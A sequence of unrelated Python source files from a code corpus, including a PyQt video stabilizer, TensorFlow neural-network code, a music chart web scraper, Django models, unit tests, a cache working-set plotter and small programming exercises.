self.tracker = Tracker(video_frames)
else:
self.tracker = Tracker(video_frames, yolo=True)
if self.tracker.bbox != (0, 0, 0, 0):
self.stabilize_file(self.config_screen.radius_slider.value())
else:
self.config_screen.button_select.clicked.connect(self._roi_selection)
def _getTrackingMode(self):
modes = ["CSRT", "KCF", "MOSSE"]
radios = [self.config_screen.radio_CSRT, self.config_screen.radio_KCF, self.config_screen.radio_MOSSE]
for i, radio in enumerate(radios):
if radio.isChecked():
return modes[i]
def stabilize_file(self, radius):
self.start_loading_screen()
self.output_options = {
'audio': self.config_screen.checkbox_audio.isChecked(),
'greyscale': self.config_screen.checkbox_greyscale.isChecked(),
'compress': self.config_screen.checkbox_compress.isChecked(),
'plots': self.config_screen.checkbox_plots.isChecked()
}
self.worker = Worker(self.tracker, self._getTrackingMode(), radius, self.output_options['plots'],
self.config_screen.checkbox_show_tracking.isChecked())
self.worker.start()
self.worker.started_tracking.connect(self._started_tracking)
self.worker.started_stabilizing.connect(self._started_stabilizing)
self.worker.finished_tracking.connect(self._finished_tracking)
self.worker.finished_stabilizing.connect(self._finished_stabilizing)
self.worker.err_sig.connect(self.stabilization_error)
def _started_tracking(self):
self.loading_screen.append_text("Tracking...")
def _started_stabilizing(self):
self.loading_screen.append_text("Stabilizing...")
def _finished_tracking(self):
self.loading_screen.append_text("Tracking completed.")
def _finished_stabilizing(self):
self.loading_screen.append_text("Stabilizing completed.")
self.output_file_path = ""
while self.output_file_path == "":
self.output_file_path, _ = QFileDialog.getSaveFileName(self, "Save file", "", "All Files (*)")
if self.output_options['greyscale']:
video_utils.convert_frames_to_greyscale(self.tracker.frames)
if self.output_options['audio'] and video_utils.contains_audio(self.input_file_path):
tempdir_path = tempfile.mkdtemp()
tempfile_name = tempdir_path + "\\tempfile.mp4"
video_utils.write_video_to_file(tempfile_name, self.tracker.frames, self.video_capture.get(cv2.CAP_PROP_FPS),
iscolor=not self.output_options['greyscale'])
video_utils.mux_video_audio(tempfile_name, self.input_file_path, self.output_file_path)
shutil.rmtree(tempdir_path)
else:
if self.output_options['compress']:
video_utils.write_video_to_file(self.output_file_path, self.tracker.frames,
self.video_capture.get(cv2.CAP_PROP_FPS),
not self.output_options['greyscale'])
video_utils.repack_video(self.output_file_path)
else:
video_utils.write_video_to_file(self.output_file_path, self.tracker.frames,
self.video_capture.get(cv2.CAP_PROP_FPS),
not self.output_options['greyscale'])
self.loading_screen.append_text(f"Saved output as {self.output_file_path}")
self.start_result_screen()
def stabilization_error(self, e):
self.loading_screen.append_text("ERROR: " + str(e))
def start_loading_screen(self):
self.loading_screen.setup_ui(self)
self.loading_screen.button_cancel.clicked.connect(self.return_to_title_screen)
self.show()
class Worker(QThread):
started_tracking = pyqtSignal()
finished_tracking = pyqtSignal()
started_stabilizing = pyqtSignal()
finished_stabilizing = pyqtSignal()
err_sig = pyqtSignal(str)
def __init__(self, tracker, tracking_mode, smoothing_radius, generate_plots, show_tracking):
super(QThread, self).__init__()
self.tracker = tracker
self.tracking_mode = tracking_mode
self.smoothing_radius = smoothing_radius
self.generate_plots = generate_plots
self.show_tracking = show_tracking
def run(self):
try:
self.started_tracking.emit()
self.tracker.tracking_data = self.tracker.track(self.tracking_mode, self.show_tracking)
self.finished_tracking.emit()
self.started_stabilizing.emit()
self.stabilizer = Stabilizer(self.tracker.frames, self.tracker.tracking_data)
self.stabilizer.stabilize(self.smoothing_radius, self.generate_plots)
self.finished_stabilizing.emit()
except Exception as e:
self.err_sig.emit(str(e))
|
StarcoderdataPython
|
6576805
|
<gh_stars>1000+
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Dual functions."""
import tensorflow.compat.v1 as tf
def get_I(l, u):
# l,u are None, n_layer tensors
# Ip: active relu units
# I: unstable relu units
Ip = tf.where(
tf.logical_and(tf.greater_equal(l, 0.), tf.greater(u, 0.)),
tf.ones_like(u), tf.zeros_like(u))
I = tf.where(
tf.logical_and(tf.greater(u, 0.), tf.less(l, 0.)), tf.ones_like(u),
tf.zeros_like(u))
return Ip, I
def get_D(l, u, Ip, I):
# D matrix for each layer
D = Ip + tf.where(tf.greater(I, 0.5), tf.divide(u, u - l), tf.zeros_like(I))
return D
def create_dual_approx(num_layers, batch_size, action_max, W_T_list, b_T_list,
action_tensor_center, return_full_info=False):
#layers_n: number of hidden units each layer
#W_T_list, b_T_list: multiplicatie and bias weights for each layer
#action_tensor_center: raw input, y: one-hot encoding of labels
# List of bounds (l_i,u_i) for i = 2,...,K-1
l_list = [tf.zeros_like(action_tensor_center)]
u_list = [tf.zeros_like(action_tensor_center)]
# List of transition matrices D_i for i = 2,...,K-1
D_list = [tf.zeros_like(action_tensor_center)]
# Indicators of spanning ReLu neurons for i = 2,...,K-1
I_list = [tf.zeros_like(action_tensor_center)]
# Indicators of active ReLu neurons for i = 2,...,K-1
Ip_list = [tf.zeros_like(action_tensor_center)]
# Final list of duals nu_i for i = 2,...,K-1
Nu_list = [tf.zeros([batch_size, W_T_list[0].get_shape().as_list()[1], 1])]
# Initialize Nu_K
Nu_K = -tf.expand_dims(-tf.eye(1), axis=-1)
# Final list of b_i'*nu_{i+1} for i = 1,...,K-1
gamma_list = [b_T_list[0]]
# Pre-compute bounds for layer 2
# Initialize Nu_hat_1
Nu_hat_1 = tf.tile(tf.expand_dims(W_T_list[0], axis=0), [batch_size, 1, 1])
# Initialize bounds
l_2 = tf.matmul(action_tensor_center,
W_T_list[0]) + gamma_list[0] - action_max * tf.norm(
Nu_hat_1, 1, axis=1, keepdims=False)
u_2 = tf.matmul(action_tensor_center,
W_T_list[0]) + gamma_list[0] + action_max * tf.norm(
Nu_hat_1, 1, axis=1, keepdims=False)
# Add to list (store in vector format)
l_list.append(l_2)
u_list.append(u_2)
# Recursion
for i in range(2, num_layers):
# form Ip, I
Ip_i, I_i = get_I(l_list[i - 1], u_list[i - 1])
I_list.append(I_i)
Ip_list.append(Ip_i)
# form D
D_i = get_D(l_list[i - 1], u_list[i - 1], Ip_i, I_i)
D_list.append(D_i)
# initialize nu_i
Nu_list.append(tf.einsum('ij,jk->ijk', D_i, W_T_list[i - 1]))
# initialize gamma_i
gamma_list.append(b_T_list[i - 1])
# if final iteration, update with Nu_K
if i == num_layers - 1:
Nu_K = tf.tile(Nu_K, [Nu_list[i - 1].get_shape().as_list()[0], 1, 1])
Nu_list[i - 1] = tf.einsum('ijk,ikm->ijm', Nu_list[i - 1], Nu_K)
gamma_list[i - 1] = tf.einsum('ij,ijm->im', gamma_list[i - 1], Nu_K)
# initialize next layer bounds
l_ip1 = tf.einsum('ij,ijm->im', l_list[i - 1] * I_list[i - 1],
tf.nn.relu(-Nu_list[i - 1]))
u_ip1 = -tf.einsum('ij,ijm->im', l_list[i - 1] * I_list[i - 1],
tf.nn.relu(Nu_list[i - 1]))
# update nu for layers i-1,...,2
for j in range(i - 1, 1, -1):
Nu_hat_j = tf.einsum('jk,ikm->ijm', W_T_list[j - 1], Nu_list[j])
Nu_list[j - 1] = tf.einsum('ij,ijk->ijk', D_list[j - 1], Nu_hat_j)
l_ip1 = tf.add(
l_ip1,
tf.einsum('ij,ijm->im', l_list[j - 1] * I_list[j - 1],
tf.nn.relu(-Nu_list[j - 1])))
u_ip1 = tf.subtract(
u_ip1,
tf.einsum('ij,ijm->im', l_list[j - 1] * I_list[j - 1],
tf.nn.relu(Nu_list[j - 1])))
# update nu_hat_1
Nu_hat_1 = tf.einsum('jk,ikm->ijm', W_T_list[0], Nu_list[1])
# start sum
psi = tf.einsum('ij,ijm->im', action_tensor_center,
Nu_hat_1) + gamma_list[i - 1]
# update gamma for layers 1,...,i-1
for j in range(1, i):
gamma_list[j - 1] = tf.einsum('ij,ijm->im', b_T_list[j - 1], Nu_list[j])
psi = tf.add(psi, gamma_list[j - 1])
Nu_hat_1_norm = tf.norm(Nu_hat_1, 1, axis=1, keepdims=False)
if i < num_layers - 1:
# finalize bounds
l_ip1 = tf.add(l_ip1, psi - action_max * Nu_hat_1_norm)
u_ip1 = tf.add(u_ip1, psi + action_max * Nu_hat_1_norm)
# add to list
l_list.append(l_ip1)
u_list.append(u_ip1)
else:
# compute J_tilde
J_tilde = -psi - action_max * Nu_hat_1_norm - u_ip1
if return_full_info:
return (-J_tilde, l_list, u_list, D_list, Nu_list, gamma_list, psi, l_ip1,
u_ip1, Nu_hat_1)
else:
return -J_tilde
|
StarcoderdataPython
|
3208209
|
my_string = 'we are fine.'
def replace_space(my_str):
my_str = str(my_str)
new = '%20'.join(my_str.split(' '))
print(new)
replace_space(my_string)
|
StarcoderdataPython
|
247741
|
from bs4 import BeautifulSoup as Soup
from muse.util import HeadlessChrome
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
import time
SITE_URL = 'http://www.melon.com'
REAL_TIME_CHART = '{0}/chart/index.htm'.format(SITE_URL)
"""
Module for
melon music chart API
Attribute:
SITE_URL: Path for melon web site
REAL_TIME_CHART: Path for melon real time chart page
"""
def get_real_time_chart_songs():
"""
Get top 100 songs
from melon real time chart
Return:
list: top 100 songs from melon real time chart
"""
songs = []
with HeadlessChrome() as chrome:
chrome.get(REAL_TIME_CHART)
wait = WebDriverWait(chrome, 10)
wait.until(EC.visibility_of_element_located((By.CSS_SELECTOR, 'tr.lst50, tr.lst100')))
soup = Soup(chrome.page_source, 'html.parser')
time.sleep(0.5)
for row in soup.select('tr.lst50, tr.lst100'):
song = {
'rank': row.select('span.rank')[0].get_text().strip(),
'title': row.select('div.rank01')[0].get_text().strip(),
'artist': row.select('div.rank02 > span.checkEllipsis')[0].get_text().strip(),
'album': row.select('div.rank03')[0].get_text().strip()
}
songs.append(song)
return songs
|
StarcoderdataPython
|
3514748
|
<filename>tasks/citation_network_task.py
from collections import namedtuple
from typing import Any, Dict, List, Iterable, Iterator
import numpy as np
import tensorflow as tf
from dpu_utils.utils import RichPath, LocalPath
from .sparse_graph_task import Sparse_Graph_Task, DataFold, MinibatchData
from utils.citation_network_utils import load_data, preprocess_features
CitationData = namedtuple('CitationData', ['adj_lists', 'num_incoming_edges', 'features', 'labels', 'mask'])
class Citation_Network_Task(Sparse_Graph_Task):
@classmethod
def default_params(cls):
params = super().default_params()
params.update({
'add_self_loop_edges': True,
'use_graph': True,
'activation_function': "tanh",
'out_layer_dropout_keep_prob': 1.0,
})
return params
@staticmethod
def name() -> str:
return "CitationNetwork"
@staticmethod
def default_data_path() -> str:
return "data/citation-networks"
def __init__(self, params: Dict[str, Any]):
super().__init__(params)
# Things that will be filled once we load data:
self.__num_edge_types = 2
self.__initial_node_feature_size = 0
self.__num_output_classes = 0
def get_metadata(self) -> Dict[str, Any]:
metadata = super().get_metadata()
metadata['initial_node_feature_size'] = self.__initial_node_feature_size
metadata['num_output_classes'] = self.__num_output_classes
return metadata
def restore_from_metadata(self, metadata: Dict[str, Any]) -> None:
super().restore_from_metadata(metadata)
self.__initial_node_feature_size = metadata['initial_node_feature_size']
self.__num_output_classes = metadata['num_output_classes']
@property
def num_edge_types(self) -> int:
return self.__num_edge_types
@property
def initial_node_feature_size(self) -> int:
return self.__initial_node_feature_size
# -------------------- Data Loading --------------------
def load_data(self, path: RichPath) -> None:
train_data, valid_data, _ = self.__load_data(path)
self._loaded_data[DataFold.TRAIN] = train_data
self._loaded_data[DataFold.VALIDATION] = valid_data
def load_eval_data_from_path(self, path: RichPath) -> Iterable[Any]:
_, _, test_data = self.__load_data(path)
return test_data
def __load_data(self, data_directory: RichPath):
assert isinstance(data_directory, LocalPath), "CitationNetworkTask can only handle local data"
data_path = data_directory.path
print(" Loading CitationNetwork data from %s." % (data_path,))
(adj_list, features, train_labels, valid_labels, test_labels, train_mask, valid_mask, test_mask) = \
load_data(data_path, self.params['data_kind'])
self.__initial_node_feature_size = features.shape[1]
self.__num_output_classes = train_labels.shape[1]
features = preprocess_features(features)
train_data = \
[self.__preprocess_data(adj_list, features, np.argmax(train_labels, axis=1), train_mask)]
valid_data = \
[self.__preprocess_data(adj_list, features, np.argmax(valid_labels, axis=1), valid_mask)]
test_data = \
[self.__preprocess_data(adj_list, features, np.argmax(test_labels, axis=1), test_mask)]
return train_data, valid_data, test_data
def __preprocess_data(self, adj_list: Dict[int, List[int]], features, labels, mask) -> CitationData:
flat_adj_list = []
self_loop_adj_list = []
num_incoming_edges = np.zeros(shape=[len(adj_list)], dtype=np.int32)
for node, neighbours in adj_list.items():
for neighbour in neighbours:
flat_adj_list.append((node, neighbour))
flat_adj_list.append((neighbour, node))
num_incoming_edges[neighbour] += 1
num_incoming_edges[node] += 1
self_loop_adj_list.append((node, node))
# Prepend the self-loop information:
num_incoming_edges = np.stack([np.ones_like(num_incoming_edges, dtype=np.int32),
num_incoming_edges]) # Shape [2, V]
return CitationData(adj_lists=[self_loop_adj_list, flat_adj_list],
num_incoming_edges=num_incoming_edges,
features=features,
labels=labels,
mask=mask)
# -------------------- Model Construction --------------------
def make_task_output_model(self,
placeholders: Dict[str, tf.Tensor],
model_ops: Dict[str, tf.Tensor],
) -> None:
placeholders['labels'] = tf.placeholder(tf.int32, [None], name='labels')
placeholders['mask'] = tf.placeholder(tf.float32, [None], name='mask')
placeholders['out_layer_dropout_keep_prob'] =\
tf.placeholder_with_default(input=tf.constant(1.0, dtype=tf.float32),
shape=[],
name='out_layer_dropout_keep_prob')
final_node_representations = \
tf.nn.dropout(model_ops['final_node_representations'],
rate=1.0 - placeholders['out_layer_dropout_keep_prob'])
output_label_logits = \
tf.keras.layers.Dense(units=self.__num_output_classes,
use_bias=False,
activation=None,
name="OutputDenseLayer",
)(final_node_representations) # Shape [V, Classes]
num_masked_preds = tf.reduce_sum(placeholders['mask'])
losses = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=output_label_logits,
labels=placeholders['labels'])
total_loss = tf.reduce_sum(losses * placeholders['mask'])
correct_preds = tf.equal(tf.argmax(output_label_logits, axis=1, output_type=tf.int32),
placeholders['labels'])
num_masked_correct = tf.reduce_sum(tf.cast(correct_preds, tf.float32) * placeholders['mask'])
accuracy = num_masked_correct / num_masked_preds
tf.summary.scalar('accuracy', accuracy)
model_ops['task_metrics'] = {
'loss': total_loss / num_masked_preds,
'total_loss': total_loss,
'accuracy': accuracy,
}
# -------------------- Minibatching and training loop --------------------
def make_minibatch_iterator(self,
data: Iterable[Any],
data_fold: DataFold,
model_placeholders: Dict[str, tf.Tensor],
max_nodes_per_batch: int) \
-> Iterator[MinibatchData]:
data = next(iter(data)) # type: CitationData
if data_fold == DataFold.TRAIN:
out_layer_dropout_keep_prob = self.params['out_layer_dropout_keep_prob']
else:
out_layer_dropout_keep_prob = 1.0
feed_dict = {
model_placeholders['initial_node_features']: data.features,
model_placeholders['adjacency_lists'][0]: data.adj_lists[0],
model_placeholders['adjacency_lists'][1]: data.adj_lists[1],
model_placeholders['type_to_num_incoming_edges']: data.num_incoming_edges,
model_placeholders['num_graphs']: 1,
model_placeholders['labels']: data.labels,
model_placeholders['mask']: data.mask,
model_placeholders['out_layer_dropout_keep_prob']: out_layer_dropout_keep_prob,
}
yield MinibatchData(feed_dict=feed_dict,
num_graphs=1,
num_nodes=data.features.shape[0],
num_edges=sum(len(adj_list) for adj_list in data.adj_lists))
def early_stopping_metric(self, task_metric_results: List[Dict[str, np.ndarray]], num_graphs: int) -> float:
# Early stopping based on average loss:
return np.sum([m['total_loss'] for m in task_metric_results]) / num_graphs
def pretty_print_epoch_task_metrics(self, task_metric_results: List[Dict[str, np.ndarray]], num_graphs: int) -> str:
return "Acc: %.2f%%" % (task_metric_results[0]['accuracy'] * 100,)
|
StarcoderdataPython
|
6475641
|
"""
pipenv run python -m unittest tests.unit.test_formCreate
"""
import unittest
from tests.integration.constants import _
from app import app
from chalicelib.models import Response, User, Form, FormOptions, Org
from chalicelib.routes import form_create
from unittest.mock import MagicMock
from bson.objectid import ObjectId
import datetime
from pymodm.errors import DoesNotExist
from chalice import UnauthorizedError
def create_org(userId):
try:
org = Org.objects.get({})
except DoesNotExist:
org = Org(cff_permissions={"a": "B"})
org.cff_permissions = {userId: {"Orgs_FormsCreate": True}}
org.save()
class FormCreate(unittest.TestCase):
def setUp(self):
app.current_request = MagicMock()
app.current_request.context = {"authorizer": {"id": "userid"}}
create_org(app.get_current_user_id())
super(FormCreate, self).setUp()
def tearDown(self):
Org.objects.delete()
super(FormCreate, self).tearDown()
def test_form_create_blank(self):
app.current_request.json_body = {
"name": "New name",
"schema": {"new": "schema"},
}
response = form_create()
form = Form.objects.get(
{"_id": ObjectId(response["res"]["form"]["_id"]["$oid"])}
)
self.assertTrue("Untitled" in form.name)
self.assertEqual(form.cff_permissions, {"userid": {"owner": True}})
def test_form_create_copy(self):
form1Id = ObjectId()
Form(
name="abc",
version=1,
center="None",
id=form1Id,
cff_permissions={"old": "cff_permissions"},
schema={"schema": "custom"},
uiSchema={"uiSchema": "custom"},
formOptions=FormOptions(
confirmationEmailInfo={"a": "B"},
paymentInfo={"c": "D"},
paymentMethods={"E": "F"},
dataOptions={"G": "H"},
defaultFormData={"I": "J"},
),
date_modified=datetime.datetime.now().isoformat(),
date_created=datetime.datetime.now().isoformat(),
).save()
app.current_request.json_body = {"formId": form1Id}
response = form_create()
form2 = Form.objects.get(
{"_id": ObjectId(response["res"]["form"]["_id"]["$oid"])}
)
form1 = Form.objects.get({"_id": form1Id})
self.assertEqual(form1.schema, form2.schema)
self.assertEqual(form1.uiSchema, form2.uiSchema)
self.assertEqual(form1.formOptions, form2.formOptions)
self.assertEqual(form2.cff_permissions, {"userid": {"owner": True}})
self.assertNotEqual(form1.name, form2.name)
self.assertTrue("Copy" in form2.name)
def test_form_create_unauthorized(self):
org = Org.objects.get({})
org.cff_permissions = {"a": "B"}
org.save()
app.current_request.json_body = {
"name": "<NAME>",
"schema": {"new": "schema"},
}
with self.assertRaises(UnauthorizedError):
response = form_create()
def test_form_create_unauthorized_no_org(self):
Org.objects.delete()
app.current_request.json_body = {
"name": "<NAME>",
"schema": {"new": "schema"},
}
with self.assertRaises(UnauthorizedError):
response = form_create()
|
StarcoderdataPython
|
8017558
|
#!/usr/bin/env python3
def main():
from scipy.special import comb
n, p = map(int, input().split())
a = list(map(int, input().split()))
e, o = 0, 0
for i in a:
if i%2 == 0:
e += 1
else:
o += 1
if n == e:
if p == 0:
print(2**n)
else:
print(0)
else:
print(2**(n-1))
main()
|
StarcoderdataPython
|
1854188
|
import numpy as np
from .. import OneHotEncoderRuntime
def test_transform():
ohe = OneHotEncoderRuntime()
X = np.array([['a'], ['b']])
X_act = ohe.fit_transform(X)
X_exp = np.array([[1, 0], [0, 1]])
assert np.all(X_exp == X_act)
|
StarcoderdataPython
|
8076271
|
<filename>runmnist.py<gh_stars>1-10
from __future__ import division
import numpy as np
import tensorflow as tf
from common import *
import datasets
from layers import *
import matplotlib.pyplot as plt
if __name__ == '__main__':
data = datasets.Mnistdata(ds=2)
sigma = 1
N = 4
lr = 0.1
rw = 0.01
layers = 8
Xbits = 14*14
ybits = 10
X = tf.placeholder(tf.float32, shape=[None,Xbits])
y_ = tf.placeholder(tf.float32, shape=[None,ybits])
y, selWs, lutWs = SelectLutLayers(N,Xbits,ybits,layers,kind="triangle",sigma=1)(X)
Ws = flatten_list(flatten_list(selWs)) + flatten_list(lutWs)
print("Total luts", len(flatten_list(lutWs)))
print("Total Muxes", len(flatten_list(flatten_list(selWs))))
loss = tf.nn.l2_loss(y-y_) + rw*binary_reg(Ws)
train_step = tf.train.GradientDescentOptimizer(lr).minimize(loss)
yscale = y > 0
y_scale = y_ > 0
correct_pred = tf.reduce_all(tf.equal(yscale,y_scale),1)
accuracy = tf.reduce_mean(tf.cast(correct_pred,tf.float32))
print("H1")
sample = 20
iters = 5000
losses = np.zeros(iters//sample)
with tf.Session() as sess:
print("H2")
tf.global_variables_initializer().run()
wval = None
for i in range(iters):
tdata = data.next_data(32)
print("H3")
_,yval,lossval,co_ped,ac= sess.run([train_step,y,loss,correct_pred,accuracy],feed_dict={X:tdata[0],y_:tdata[1]})
if (i%sample==0):
print(lossval, "("+str(i)+"/"+str(iters)+")")
print(" cor",scaleto01(tdata[1][0]))
print(" lrn",scaleto01(yval[0],False))
losses[i//sample] = lossval
print("co,ac",co_ped,ac)
print("Accuracy!")
print(accuracy.eval(feed_dict={X:data.test[0],y_:data.test[1]}))
print(sess.run(Ws[0]))
plt.figure(1)
plt.plot(losses)
plt.xlabel("iter/"+str(sample))
plt.ylabel("loss")
plt.show()
|
StarcoderdataPython
|
4933521
|
<filename>cacheTraceAnalysis/plot/workingset.py<gh_stars>1-10
"""
plots how total workseting set increase over time
"""
import os, sys
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), "../"))
from utils.common import *
import bisect
SLAB_SIZES = [96, 120, 152, 192, 240, 304, 384, 480, 600, 752, 944, 1184, 1480, 1856, 2320, 2904, 3632, 4544, 5680, 7104, 8880,
11104, 13880, 17352, 21696, 27120, 33904, 42384, 52984, 66232, 82792, 103496, 129376, 161720, 202152, 252696,
315872, 394840, 524288, 655360, 819200, 1024000, 1280000, 1600000, 2000000, 2500000, 3125000, 3906250,
]
def _cal_total_workingset_size(trace_reader, window=300, consider_ttl=True, slab_sizes=None):
""" calculate how working set size change over time
"""
metadata_name = "ttl_w{}_{}{}_{}.pickle".format(window, consider_ttl, "_slab" if slab_sizes is not None else "", trace_reader.trace_path.split("/")[-1])
loaded = load_metadata(metadata_name)
if loaded is not None:
return loaded
ttl_obj = defaultdict(list) # the objects that expire at ttl
workingset = {} # obj -> size
workingset_size = 0
workingset_size_list = []
sz_to_slab_mapping = {}
start_ts, current_ts, last_window_ts = -1, 0, 0
for req in trace_reader:
current_ts = req.real_time
if start_ts == -1:
start_ts = req.real_time
if req.op == "set" or req.op == "add":
if req.obj_id not in workingset:
sz = req.obj_size
# sz = 1
if slab_sizes is not None:
# find the slab this object will use
if sz not in sz_to_slab_mapping:
sz_slab = slab_sizes[bisect.bisect_right(slab_sizes, sz)]
sz_to_slab_mapping[sz] = sz_slab
sz = sz_slab
else:
sz = sz_to_slab_mapping[sz]
workingset_size += sz
workingset[req.obj_id] = sz
if consider_ttl and req.ttl != 0:
ttl_obj[current_ts+req.ttl].append(req.obj_id)
if consider_ttl and current_ts in ttl_obj:
for obj in ttl_obj[current_ts]:
workingset_size -= workingset[obj]
del workingset[obj]
del ttl_obj[current_ts]
if (req.real_time - start_ts) % window == 0 and req.real_time != last_window_ts:
workingset_size_list.append(workingset_size)
# print("{} append {}".format(req.real_time, workingset_size))
last_window_ts = req.real_time
save_metadata(workingset_size_list, metadata_name)
trace_reader.reset()
return workingset_size_list
def plot_total_workingset_size(trace_reader, window, consider_ttl=True, slab_sizes=None):
figname = "{}/{}_{}_workingset".format(FIG_DIR, trace_reader.trace_path.split("/")[-1], window)
if consider_ttl:
figname = "{}_ttl".format(figname)
if slab_sizes is not None and slab_sizes is not False:
figname = "{}_slab".format(figname)
if slab_sizes is True:
slab_sizes = SLAB_SIZES
n_color = 2
if slab_sizes:
n_color = 4
plt.set_n_colors(n_color)
ret_dict = {}
workingset_size_list = _cal_total_workingset_size(trace_reader, window, False, slab_sizes=None)
plt.plot([i*window/3600 for i in range(len(workingset_size_list))],
[sz/MB for sz in workingset_size_list], nomarker=True, label="no-ttl")
ret_dict["no-ttl"] = workingset_size_list[-1]
if consider_ttl:
workingset_size_list = _cal_total_workingset_size(trace_reader, window, True, slab_sizes=None)
plt.plot([i*window/3600 for i in range(len(workingset_size_list))],
[sz/MB for sz in workingset_size_list], nomarker=True, label="ttl")
ret_dict["ttl"] = workingset_size_list[-1]
if slab_sizes:
workingset_size_list = _cal_total_workingset_size(trace_reader, window, False, slab_sizes=slab_sizes)
plt.plot([i*window/3600 for i in range(len(workingset_size_list))],
[sz/MB for sz in workingset_size_list], nomarker=True, label="no-ttl-slab")
ret_dict["no-ttl-slab"] = workingset_size_list[-1]
workingset_size_list = _cal_total_workingset_size(trace_reader, window, True, slab_sizes=slab_sizes)
plt.plot([i*window/3600 for i in range(len(workingset_size_list))],
[sz/MB for sz in workingset_size_list], nomarker=True, label="ttl-slab")
ret_dict["ttl-slab"] = workingset_size_list[-1]
if "ttl" in ret_dict and ret_dict["no-ttl"]/ret_dict["ttl"] > 100:
plt.yscale("log")
plt.xlabel("Time (hour)")
plt.ylabel("Working set size (MB)")
# plt.ylabel("Working set size (# million Obj)")
plt.legend()
plt.grid(linestyle="--")
plt.savefig(figname, no_save_plot_data=True)
plt.clf()
return ret_dict
if __name__ == "__main__":
import argparse
ap = argparse.ArgumentParser()
ap.add_argument("--trace", type=str, help="trace path")
ap.add_argument("--window", type=int, default=300, help="window size")
p = ap.parse_args()
reader = TwrShortBinTraceReader(p.trace)
plot_total_workingset_size(reader, p.window)
|
StarcoderdataPython
|
9758079
|
<gh_stars>1-10
"""<NAME>'s aospy.Proj object for CMIP5 data."""
from aospy.proj import Proj
from aospy_user import regions, models
cmip5 = Proj(
'cmip5',
direc_out='/work/Spencer.Hill/',
tar_direc_out='/archive/Spencer.Hill/',
nc_dir_struc='one_dir',
models=(
models.bcc_csm1, models.bnu_esm, models.cccma_canam4,
models.cccma_cancm4, models.cccma_canesm2, models.cmcc_cesm,
models.cmcc_cm, models.cmcc_cms, models.cnrm_cm5, models.cnrm_cm5_2,
models.cola_cfsv2, models.csiro_bom_access1_0,
models.csiro_bom_access1_3, models.csiro_qccce_mk3_6_0, models.fio_esm,
models.ichec_ec_earth, models.inm_cm4, models.inpe_hadgem2_es,
models.ipsl_cm5a_lr, models.ipsl_cm5a_mr, models.ipsl_cm5b_lr,
models.lasg_cess_fgoals_g2, models.lasg_iap_fgoals_g1,
models.lasg_iap_fgoals_s2, models.miroc4h, models.miroc5,
models.miroc_esm, models.miroc_esm_chem, models.mohc_hadcm3,
models.mohc_hadgem2_a, models.mohc_hadgem2_cc,
models.mohc_hadgem2_es, models.mpi_m_esm_lr, models.mpi_m_esm_mr,
models.mpi_m_esm_p, models.mri_agcm3_2h, models.mri_agcm3_2s,
models.mri_cgcm3, models.mri_esm1, models.nasa_giss_e2_h,
models.nasa_giss_e2_h_cc, models.nasa_giss_e2_r,
models.nasa_giss_e2_r_cc, models.nasa_gmao_geos_5, models.ncar_ccsm4,
models.ncc_noresm1_m, models.ncc_noresm1_me, models.ncep_cfsv2_2011,
models.nimr_kma_hadgem2_ao, models.gfdl_cm2_1, models.gfdl_cm3,
models.gfdl_esm2m, models.gfdl_esm2g, models.gfdl_hiram_c180,
models.gfdl_hiram_c360, models.cesm1_bgc, models.cesm1_cam5,
models.cesm1_fastchem, models.cesm1_waccm, models.smhi_ec_earth,
models.unsw_csiro_mk3l_1_2
),
default_models=(
models.bcc_csm1,
models.cccma_canam4,
models.cnrm_cm5,
models.ichec_ec_earth,
models.ipsl_cm5a_lr,
models.ipsl_cm5b_lr,
models.lasg_cess_fgoals_g2,
models.miroc5,
models.mohc_hadgem2_a,
models.mpi_m_esm_lr,
models.mpi_m_esm_mr,
models.mri_cgcm3,
models.ncar_ccsm4,
models.cesm1_cam5
),
regions=(
regions.globe,
regions.nh,
regions.sh,
regions.tropics,
regions.wpwp,
regions.epac,
regions.sahel,
regions.sahel2,
regions.sahel3,
regions.sahara,
regions.ind_monsoon,
regions.land,
regions.ocean,
regions.trop_land,
regions.trop_ocean,
regions.sahel_south,
regions.sahel_north,
regions.sahel_east,
regions.sahel_west
)
)
|
StarcoderdataPython
|
11306522
|
from django.conf import settings
from django.core.files.storage import FileSystemStorage
upload_storage = FileSystemStorage(location=settings.UPLOAD_ROOT)
|
StarcoderdataPython
|
8114516
|
<filename>reports_api/reports/models/speaker_registration.py
"""
* Copyright 2019 OpenStack Foundation
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
* http://www.apache.org/licenses/LICENSE-2.0
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
"""
from django.db import models
from .speaker import Speaker
class SpeakerRegistration(models.Model):
id = models.IntegerField(db_column='ID', primary_key=True)
confirmation_date = models.DateTimeField(db_column='ConfirmationDate')
email = models.TextField(db_column='Email')
confirmed = models.BooleanField(db_column='IsConfirmed')
speaker = models.OneToOneField(
Speaker, on_delete=models.CASCADE, related_name='registration', db_column='SpeakerID')
def __str__(self):
return self.id
class Meta:
app_label = 'reports'
db_table = 'SpeakerRegistrationRequest'
|
StarcoderdataPython
|
11366931
|
<filename>pythonbrasil/exercicios/repeticao/ER resp 26.py
'''
Numa eleição existem três candidatos. Faça um programa que peça o número total de eleitores.
Peça para cada eleitor votar e ao final mostrar o número de votos de cada candidato.
'''
cand1, cand2, cand3 = 0,0,0
print('******************************************************')
print('********************** ELEIÇÕES **********************')
print('******************************************************')
print('\n')
eleitores = int(input('\tDigite o número total de eleitores: '))
print('')
for i in range(eleitores):
voto = int(input('\t Vote nos candidatos(1,2,3):'))
if voto == 1:
cand1 += 1
if voto == 2:
cand2 += 1
if voto == 3:
cand3 += 1
print('\n')
print('\t\t TOTAL DE VOTOS:')
print('\t\t Candidato 1: ',cand1)
print('\t\t Candidato 2: ',cand2)
print('\t\t Candidato 3: ',cand3)
print('\n')
print('******************************************************')
